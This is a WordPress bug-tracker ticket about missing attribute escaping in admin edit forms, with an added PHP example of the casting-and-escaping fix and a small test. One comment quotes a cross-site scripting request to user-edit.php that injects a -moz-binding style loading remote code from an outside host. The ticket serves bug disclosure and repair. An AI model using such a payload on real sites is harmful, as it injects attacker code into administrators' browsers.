Opened 18 years ago
Closed 18 years ago
#4333 closed defect (bug) (fixed)
Some attribute_escape()s and relatives for edit forms
Reported by: | | Owned by: | |
---|---|---|---|
Milestone: | 2.2.1 | Priority: | high |
Severity: | normal | Version: | 2.2 |
Component: | Administration | Keywords: | |
Focuses: | | Cc: | |
Description
Attachments (3)
Change History (14)
#2, 18 years ago
- Owner changed from anonymous to rob1n
Also, looks like we could use some selected()'s in there.
#4, 18 years ago
- Resolution set to fixed
- Status changed from new to closed
Looks like those <select>'s options aren't going to work with selected().
#5, 18 years ago
- Milestone changed from 2.3 to 2.2.1
- Resolution fixed deleted
- Status changed from closed to reopened
Also needs to go into 2.2.1 and 2.0.11
#8, 18 years ago
Well, I make some trunk based patches for 2.2.
Obviously I don't add anything that has to be related with the trunk version.
Also I think that the trunk solution is incomplete because it doesn't filter the user-edit.php based version of the bug:
user-edit.php?user_id=1&wp_http_referer=%22style=-moz-binding:url(%22http://ha.ckers.org/xssmoz.xml%23xss%22)'
The int casts can go in get_category_to_edit() and the other to_edit() functions since we always want them to be ints. attribute_escape() needs more context, so calling it from the forms is good.
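
An added illustration of the split discussed in this ticket, not code from WordPress or from the attached patches: the ID is cast to int in a to_edit-style loader, and the referer value is escaped where the form prints it. `example_attribute_escape()`, `example_user_to_edit()`, the hidden-field markup and the sample request are assumptions constructed for this example.

```php
<?php
// Hypothetical stand-in for attribute_escape(); WordPress's own function is not reproduced here.
function example_attribute_escape(string $text): string {
    return htmlspecialchars($text, ENT_QUOTES, 'UTF-8');
}

// Hypothetical to_edit-style loader: the ID is always wanted as an int, so cast it here.
function example_user_to_edit(array $request): array {
    return [
        'user_id' => (int) ($request['user_id'] ?? 0),
        'referer' => (string) ($request['wp_http_referer'] ?? ''),
    ];
}

// "Before": the value is printed into the attribute as received.
function render_referer_unescaped(array $user): string {
    return '<input type="hidden" name="wp_http_referer" value="' . $user['referer'] . '" />';
}

// "After": escaping is done by the form, which knows it is writing an attribute value.
function render_referer_escaped(array $user): string {
    return '<input type="hidden" name="wp_http_referer" value="'
        . example_attribute_escape($user['referer']) . '" />';
}

// Parse the markup the way a browser would and list the attributes the element ends up with.
function attribute_names(string $html): array {
    $doc = new DOMDocument();
    $doc->loadHTML($html, LIBXML_NOERROR | LIBXML_NOWARNING);
    $names = [];
    foreach ($doc->getElementsByTagName('input')->item(0)->attributes as $attr) {
        $names[] = $attr->name;
    }
    return $names;
}

// Constructed sample request: a non-numeric ID and a referer containing a double quote.
$request = ['user_id' => '1abc', 'wp_http_referer' => '" style="color:red'];
$user = example_user_to_edit($request);

var_dump($user['user_id']);                                    // the cast leaves a plain int
echo implode(',', attribute_names(render_referer_unescaped($user))), "\n"; // extra attribute appears
echo implode(',', attribute_names(render_referer_escaped($user))), "\n";   // only the intended ones
```

A check like `attribute_names()` can be reused as a regression test for any edit form field that prints request data into an attribute.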